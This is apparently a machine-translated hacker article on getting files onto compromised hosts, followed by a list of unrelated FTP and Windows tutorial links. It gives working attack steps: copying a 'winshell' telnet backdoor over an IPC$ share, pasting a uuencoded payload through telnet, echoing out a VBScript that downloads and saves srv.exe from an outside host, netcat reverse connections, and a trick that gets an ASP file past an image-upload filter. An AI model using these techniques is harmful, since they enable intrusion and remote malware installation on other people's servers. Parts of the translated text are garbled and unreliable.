File uploading is a long time ago. The earliest common one is the IPC connection, and then one by one COPY. Since the open file vulnerability has come out, various file systems such as PHP.JSP have file vulnerabilities. Out, the principle is similar, there is no filter file upload path, which can capture the packet and then change the space 20 to 00, become a null character NULL, the system is recognized from right to left, so the empty character is truncated, and more The simple thing is that the filter file upload type is incomplete, and the suffix can be solved. The vulnerability of these uploaded files can be easily solved with the universal upload tool, but the name of the vulnerability file is different. There are also some alternative file uploading methods that are done under the precautions of the system. Thanks to CD-LION for providing one. First COPY winshell.exe, open a telnet port, the command line is always easier than in the browser. copy \\\\myIP\\c$\\tools\\winshell.exe d:\\downloads\\winzip32 has copied a file to start it d:\\downloads\\winzip32\\winshell.exe The browser window will stop for a long time, no need to wait, the program has started, stop, and then disconnect the shared connection: net use \\\\myIP\\c$ /del complete 1 use telnet Upload file by :[email protected] If ftp is closed, sendmail will not work. How to upload the compiled file to the host? The method is very simple: 1. First encode the file to be uploaded with uuedcode, the file will change. It looks like the following: begin 644 file.bat MC!J95@T92TP, #503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J M95@T85!9 +7@M04%28#!@*CTP,’500D])04%!049+04]"4$E$34-"04Q%04I- M3D-"2D%,24%!14U-3D -"1D5’24=&0T%%3D="1T1(0T=02$=’2DA#2$9(1$-! M1TI(1$-!1T1’4$=.1TI’3T= (0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@ M"D!%0TA/($]&1B`*0T]062`E," ;Y"050@+T(@0SI<0D%45DE2+ D-/32`O0B`O E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@`` ` end sum - r/size 17903/262 All are visible ASCII characters. 2. Connect to the host with TELNET and enter $ cat >a and then copy/paste with WINODWS, paste the file into the telnet window and press ^d to generate in the current directory. File a 3.uudecode a file recovery, then chmod can be a very good 3 script, just save the source code to a file to run. So in the shell, use the echo statement to write directly to a file, you can use the corresponding interpreter to execute. Here is a simplification of a program instance: echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs echo xPost.Open "GET","http://167168.meibu.com/srv.exe" ;;;,0 >>167168.vbs echo xPost.Send() >>167168.vbs echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs echo sGet.Mode = 3 >>167168.vbs echo sGet.Type = 1 >>167168.vbs echo sGet.Open() >>167168.vbs echo sGet.Write(xPost.responseBody) >>167168.vbs Echo sGet.SaveToFile "srv.exe",2 >>167168.vbs Then execute cscript 167168.vbs. It can be changed to http://167168.meibu.com/srv.exe The website path, srv.exe can be changed to the path to save the file. 4.start its:http://167168.meibu.com/ca.rar (See clearly, be careful with the forum automatically added tags) cd "C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content .IE5\\" (assuming the system is installed on the c drive, and the current environment is SYSTEM. If it is a user environment, modify the Default User for the username) dir /s ca[1].rar Then it will display ca[1].rar Specific location, such as C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5QMVC11H\\ca[1].rar Last: copy 0QMVC11H\\ca[1].rar c:\\winnt\\system32\\ Ca.rar del 0QMVC11H\\ca[1].rar There is also the ability to use EXE2BAT to convert to batch processing, and then upload, this method is limited to small files, the file will be wrong when pasting too long, it is good to pass a NC to do reverse connection s Choice. Recently, I also met an alumni system. I can only upload photos after registration (SESSION). I found that I can upload any files after registration, but I can only parse the suffix of the image type. This situation should be added on the server. A layer of JSP recognition, if you use local submission can bypass JSP correction, but no login, the first layer of SESSION verification will not pass, the upload idea is to change the ASP file into a JPG suffix upload, and then capture the package, here The data packet already contains the SESSION value, and then the modified suffix is ASP, submitted with NC, the principle is like this, the specific test is in progress..
1. Install the vsftpd service and db <! --[endif]--> <! --[if ! supportLists]--&
Many users do not know how to set up intranet ftp server Here to do a simple tutorial for everyone
RHEL5.5 VSFTP2.0.5 virtual user configuration different permissions linux use vsftp to bui
Before reading this article, there are a few points to note. 1, everyones full control of th
Computer Technology: "Account" (Account) of Serv-U User Attributes
Ftp upload or browse Chinese garbled problem
Computer Tutorial: Building an FTP Server under Win 2003
How to achieve security of FTP server
Serv u software attack defense
Computer Tutorial: Serv-U Manager
The ftp server is a brief introduction to
Several reasons for Windows 7 to subvert the Vista system
Daping home repair computer is good?
Win10 automatic update in which Windows10 automatic update settings
Win7 system prompts for virtual memory shortage
How to find the shortcut path corresponding to the program in win7 computer
Cleaning up Windows 7 system junk files
How to set win10 standby time?